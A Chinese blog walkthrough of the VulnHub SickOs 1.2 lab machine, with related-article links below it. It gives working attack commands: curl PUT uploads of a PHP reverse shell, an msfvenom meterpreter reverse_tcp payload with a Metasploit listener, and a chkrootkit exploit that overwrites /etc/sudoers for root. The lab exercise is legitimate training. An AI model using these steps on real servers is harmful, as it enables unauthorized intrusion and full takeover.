靶机12:sickos-1.2

已于 2023-11-10 15:40:06 修改
阅读量166 收藏 1
点赞数 1
分类专栏: 靶机 文章标签: 服务器 linux 网络
于 2023-10-31 17:17:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/133964616
版权

sickos-1.2

1.信息收集

1.arp-scan -l扫描IP

sudo arp-scan -l

2.nmap 扫描端口

sudo nmap 192.168.221.129 -T4

查看80端口

3.没有发现可用信息,dirsearch扫描目录

dirsearch --url http://192.168.221.129

访问http://192.168.221.129/test/ 

5.网站指纹识别

whatweb http://192.168.221.129

经过在网上搜索,也没有发现web服务器的版本漏洞

2. 查看/test目录支持的方法

1.使用nmap脚本进行扫描

nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.221.129

我们可以看到支持PUT方法,我们可以想到PUT文件上传

2.验证PUT方法,向服务器写入文件

PUT方法写入phpinfo主页

成功访问

3、 漏洞利用

方法一:

1.curl上传php反弹shell脚本

使用linux自带php反弹shell脚本,使用时对ip与port要进行修改

2.使用curl命令工具将php-reverse-shell.php脚本上传至服务器

curl -v -T php-reverse-shell.php "http://192.168.30.208/test/"
#-v, --verbose                  输出详细内容
#-T, --upload-file FILE			后跟上传目标文件(Transfer)
#-H, --header      LINE         添加请求头, 可添加多个 -H 参数,

上传失败,出现417错误

查找资料发现需要在curl的参数中加上特定的HTTP Header Expect:,即将Header中Expect的值手动指定为空

3.再次上传脚本文件

curl -v -T php-reverse-shell.php  -H 'Expect:' "http://192.168.221.129/test/"

4.kali进行监听1234端口

发现不行

方法二:

msfvenom 生成攻击载荷 + curl上传

1、使用msfvenom生成攻击载荷

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.221.128 lport=443 R >php_shell.php

2.使用curl将生成的攻击载荷上传至服务器

curl -v -T php_shell.php  -H 'Expect:' "http://192.168.221.129/test/"

3.设置msf进行监听

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.221.128

set lport 443

exploit

点击上传文件

反弹成功

shell

python -c 'import pty;pty.spawn("/bin/bash")'

4.本地提权

1.查看

2. 查看靶机的版本及内核信息

lsb_release -a

3. 查看/etc/cron*下所含的所有文件

crontab 是用来让使用者在固定时间或固定间隔执行程序之用,换句话说,也就是类似使用者的时程表

ls -la /etc/cron*

在/etc/cron.daily目录下,发现chkrootkit工具

4. 查看chkrootkit的版本

chkrootkit -V

5.搜索chkrootkit 0.49版本漏洞

6.提权,将当前用户(www-data)加入sudo组

7./tmp目录下 updata文件,并赋予可执行权限

touch update
chmod +x update

8.向update文件中写入将www-date添加到sudo组的命令

user1 ALL=(ALL) ALL

#我们来说一下这一行的配置的意思
#user1 表示该用户user1可以使用sudo命令,第一个ALL指的是网络中的主机(可以是主机名也可以是ip地址),它指明user1用户可以在此主机上执行后面命令;第二个括号里的ALL是指目标用户,也就是以谁的身份去执行命令。最后一个ALL是指命令路径。

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)  NOPASSWD:ALL" > /etc/sudoers' > /tmp/update

9.查看当前用户可执行的sudo文件

sudo -l

10.切换用户

sudo su root

wj33333
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7124
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3818
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
sickOS1.2靶机(超详细)!
qq_68868384的博客
08-16 277
正常模式是默认的,所以-T3什么也不做。看到这个页面把目录下的文件都显示的出来,那么我们看看能不能上传文件,在页面上是没有上传文件的地方,那么我们看一下这个URL支持的请求有哪几种方法,我们可以看到它容许put请求,那试一下put文件上传漏洞可不可行。用burp进行抓包,然后修改它的数据,先尝试一下,让它输出一个phpinfo的页面出来,发现成功了,那么接下来我们就可以上蚁剑了,将蚁剑的木马写入到目标服务器中。注:dir:使用文件/目录枚举模式,-w:指定字典,-x:扫描文件时的后缀名,-u:url地址,
靶机渗透实战——SickOs1.2
wlw876747595的博客
12-17 881
一、实验环境 靶机SickOs1.2,IP地址暂时未知 测试机:Kali(IP:192.168.232.130) 测试机:物理机win7 二、实验流程 信息收集——主机发现 信息收集——端口扫描 渗透测试 三、实验步骤 (一)信息收集——主机发现 1、查看kaliIP信息 2、查看靶机页面 3、扫描主机(netdiscover) netdiscover -i e...
vulnhub靶场渗透之SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 1934
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
如何查看linux php版本信息,linux,apache,php,mysql常用的查看版本信息的方法
weixin_27972919的博客
03-12 453
标签:linux版本信息phpapachemysql 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://www.voidcn.com/article/p-hwrkgtnp-vs.html1、 查看linux的内核版本,系统信息,常用的有三种办法:uname -a; more /etc/issue; cat /proc/versio...
Vulnhub靶机SickOs1.2
最新发布
qq_48904485的博客
03-21 746
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
vulntarget-a靶场复现
weixin_52158313的博客
12-29 670
vulntarget-a靶场复现
php 靶机,php反序列化靶机serial实战
weixin_39552037的博客
03-10 372
靶机描述今天研究一下php反序列化,靶机serial实战。目标为获取root权限。靶机信息可以去vulhub上下载此靶机:https://www.vulnhub.com/entry/serial-1,349/下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。 ...
综合靶机渗透测试解析
w_j_x_123的博客
05-30 559
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
VulnHub之sickOs1.2 writeup
公众号shadow sock7
07-18 1831
vulhub box下载 https://www.vulnhub.com/entry/sickos-12,144/#vm https://download.vulnhub.com/sickos/sick0s1.2.zip 步骤 探测IP和服务 先用nmap探测IP和服务,发现只开了22和80,然后HTTP服务是lighttpd/1.4.28。 nikto扫 然后用nikt...
kali渗透综合靶机(十二)--SickOs1.2靶机
WY92139010的博客
05-22 619
kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.170  ...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4290
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机的实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值